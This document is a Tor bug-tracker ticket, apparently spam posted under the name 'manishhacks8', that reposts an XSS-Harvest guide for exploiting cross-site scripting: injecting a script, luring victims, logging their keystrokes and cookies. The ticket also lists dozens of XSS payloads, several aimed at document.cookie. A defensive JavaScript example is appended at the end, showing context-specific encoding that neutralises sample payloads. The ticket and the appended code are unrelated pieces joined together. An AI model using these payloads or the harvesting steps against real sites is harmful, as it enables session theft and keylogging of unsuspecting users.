[tor-bugs] #23014 [- Select a component]: manish
#23014: manish
--------------------------------------+--------------------------------
Reporter: manishhacks8 | Owner:
Type: enhancement | Status: new
Priority: Medium | Milestone: Tor: 0.3.1.x-final
Component: - Select a component | Version:
Severity: Normal | Keywords:
Actual Points: | Parent ID:
Points: | Reviewer:
Sponsor: |
--------------------------------------+--------------------------------
* Server console displays real-time data received (due to its
multi-threaded nature, keystrokes are displayed as ‘.’ characters to avoid
confusion).
* Tested in IE6-9 (reflected XSS protection in IE9 will limit exploitation
to stored XSS only in most cases), FF5, Chrome and various mobile browsers
(Safari and Android). Please let me know your success with other browsers.
* Overcomes browser oddities, such as Internet Explorer throttling
requests to the same URL when exfiltrating keystrokes.
How to Exploit XSS with XSS-Harvest?
Identify a page vulnerable to XSS (reflected or persistent will be fine –
unless the victim is running IE9 or another plugin such as NoScript).
Understand the markup of the page. You should be looking to insert
syntactically correct <script></script> tags in to the source of the
vulnerable page. Most attackers will insert something like
‘<script>alert(1)</script>’ at this stage to ensure the page is actually
vulnerable.
Start the XSS-Harvest server as root if you wish to bind to a TCP port <
1024 (default port is 80), or as a limited user on a port > 1024 using the
-p option. To start the server you must instruct it to listen with the -l
option.
Insert the following ‘injection string’ into the vulnerable page:
<script src=">
This will return the client-side JavaScript to the victim, indicated by
the ‘i’ in the URL.
Entice visitors to the infected page (or to follow a link in the case of
reflected XSS).
Watch your victims roll in – a new history file will be created for each
new victim.
To use the redress function, start the server with the -r parameter:
./xss-harvest.pl -l -r http://vulnerablepage.local/login.html
Basic dependencies:
HTTP::Server::Simple::CGI, Digest::MD5, Time::Local, Getopt::Std,
Net::Server::PreFork
Download XSS-Harvest
New: Advanced Scripts To Find XSS Vulnerabilities In Websites.
Just copy any script and try.
To Redirect exploit code:
';redirecturl='javascript:alert("XSS")
';redirecturl='http://google.com/'
Now for XSS
Example: www.xyz.com?q="XSS Script"
"/>alert("Xss:Priyanshu")
"/></script><script>alert(/XSS : Priyanshu/)</script>
<body onload=alert(1)>
"<body onload="alert('XSS by Priyanshu')">
"><%2Fstyle<%2Fscript><script>confirm("XSS By Priyanshu")<%2Fscript>
<body onload=document.getElementById("xsrf").submit()>
<a href="data:text/html;base64_,<svg/onload=\u0061l&101%72t(1)>">X</a
<a href="data:text/html;base64_,<svg/onload=\u0061l&101%72t(document.cookie)>">X</a
http://test.com<script>alert(document.domain)</script>
http://test.com<script>alert(document.cookie)</script>
<img src=x onerror=alert(document.domain)>
x"></script><img src=x onerror=alert(1)>
q=" onclick="alert(/XSS/)
"><iframe src='javascript:prompt(/XSS/);'>
<iframe src="http://google.com"></iframe>
"><iframe src=a onload=alert('XSS')<
</script><script>alert(document.cookie)</script>
<xss>alert('xss')</xss>
DOM Based XSS Scripts
/default.aspx#"><img src=x onerror=prompt('XSS');>
/default.aspx#"><img src=x onerror=prompt('0');>
<img src=x onerror=prompt(1);> by ">
"><img src=x onerror=prompt(0)>.txt.jpg
"><img src=x onerror=alert(document.cookie)>
"><img src=x onerror=prompt(1);>
"><script>alert('XSS')</script>
id=abc"><Script>alert(/xss/)</SCRIPT>
"><img src=" " onMouseover=prompt(/xss/);>
Default.aspx/" onmouseout="confirm(1)'x="
For More Script Coding Of XSS Visit ha.ckers.org and Brute.
--
Ticket URL: <https://trac.torproject.org/projects/tor/ticket/23014>
Tor Bug Tracker & Wiki <https://trac.torproject.org/>
The Tor Project: anonymity online
_______________________________________________
tor-bugs mailing list
tor-bugs@xxxxxxxxxxxxxxxxxxxx
https://lists.torproject.org/cgi-bin/mailman/listinfo/tor-bugs
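The payloads in the ticket above each assume one of three injection contexts: an HTML attribute value (the `"/>` and `" onclick=` strings), an HTML text node (the `<img onerror>` and `<script>` strings), or a JavaScript string literal (the `';redirecturl='` strings). The following is an added example, not code from the ticket or from the XSS-Harvest project: it builds three constructed templates that reflect a parameter either raw (the vulnerable case the payloads assume) or through the encoder appropriate to that context, and then checks whether each template's structure survived. The template markup, the function names and the sample payload selection are assumptions made for the example.

```javascript
// Added example (not from the ticket or from XSS-Harvest). Three constructed
// templates reflect a query parameter q into an attribute value, a text node and
// a JS string literal, raw or encoded; the *Intact checks tell whether q escaped
// its context. Everything here (markup, names, sample payloads) is constructed.

// HTML text and attribute-value contexts: entity-encode the five significant characters.
function encodeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, (c) => map[c]);
}

// JavaScript string-literal context: escape every non-alphanumeric character as
// \xHH or \uHHHH, so neither a quote nor a "</script" sequence can end the literal
// or the surrounding script block.
function encodeJsString(s) {
  return s.replace(/[^A-Za-z0-9]/g, (c) => {
    const cp = c.charCodeAt(0);
    return cp < 0x100
      ? '\\x' + cp.toString(16).padStart(2, '0')
      : '\\u' + cp.toString(16).padStart(4, '0');
  });
}

// Constructed templates; encode=false reproduces the vulnerable raw reflection.
function renderAttr(q, encode) {
  return '<input value="' + (encode ? encodeHtml(q) : q) + '">';
}
function renderText(q, encode) {
  return '<p>' + (encode ? encodeHtml(q) : q) + '</p>';
}
function renderJs(q, encode) {
  return "<script>var q='" + (encode ? encodeJsString(q) : q) + "';</script>";
}

// Structure checks: true when the reflected value stayed inside its context.
// Attribute value: nothing may close the quoted value early.
function attrIntact(html) {
  return /^<input value="[^"]*">$/.test(html);
}
// Text node: no new tag may start inside it.
function textIntact(html) {
  return /^<p>[^<]*<\/p>$/.test(html);
}
// JS string: no unescaped quote and no "</script" inside the literal.
function jsIntact(html) {
  return /^<script>var q='(?:(?!<\/script)[^'])*';<\/script>$/.test(html);
}

// For each payload, report which contexts it breaks out of when reflected raw.
function survey(payloads) {
  const out = {};
  for (const p of payloads) {
    out[p] = {
      attr: !attrIntact(renderAttr(p, false)),
      text: !textIntact(renderText(p, false)),
      js: !jsIntact(renderJs(p, false)),
    };
  }
  return out;
}

// With encoding on, does every payload stay inside every context?
function allNeutralized(payloads) {
  return payloads.every((p) =>
    attrIntact(renderAttr(p, true)) &&
    textIntact(renderText(p, true)) &&
    jsIntact(renderJs(p, true)));
}

// Constructed sample: four payloads taken from the list in the ticket.
const SAMPLE_PAYLOADS = [
  '"/>alert("Xss")',
  '<img src=x onerror=alert(document.domain)>',
  "';redirecturl='javascript:alert(\"XSS\")",
  'x"></script><img src=x onerror=alert(1)>',
];

console.log(JSON.stringify(survey(SAMPLE_PAYLOADS), null, 2));
console.log('all neutralized with encoding:', allNeutralized(SAMPLE_PAYLOADS));
```

Two details of the raw survey are worth noticing: `<img src=x onerror=...>` does not escape a quoted attribute value (it contains no `"`), which is why the list pairs it with a `">` prefix for attribute injection points; and `';redirecturl='javascript:alert("XSS")` escapes the attribute context too, purely because of the double quotes inside `alert("XSS")`. Matching the encoder to the context, not the payload, is what makes every row of the survey come out intact.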